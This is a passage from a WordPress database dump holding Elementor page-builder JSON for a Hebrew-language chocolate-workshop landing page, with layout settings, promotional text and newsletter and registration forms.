\\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"\\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4?\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(532,121,'_elementor_version','0.4'),(533,122,'_wp_page_template','elementor_canvas'),(534,122,'_elementor_edit_mode','builder'),(535,122,'_elementor_template_type','post'),(536,122,'_elementor_data','[{\"id\":\"3d7689b8\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"570504a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4fadbe7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"376ec0e9\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2a6711cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"66f452c6\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"label_typography_typography\":\"custom\",\"label_typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"},\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"c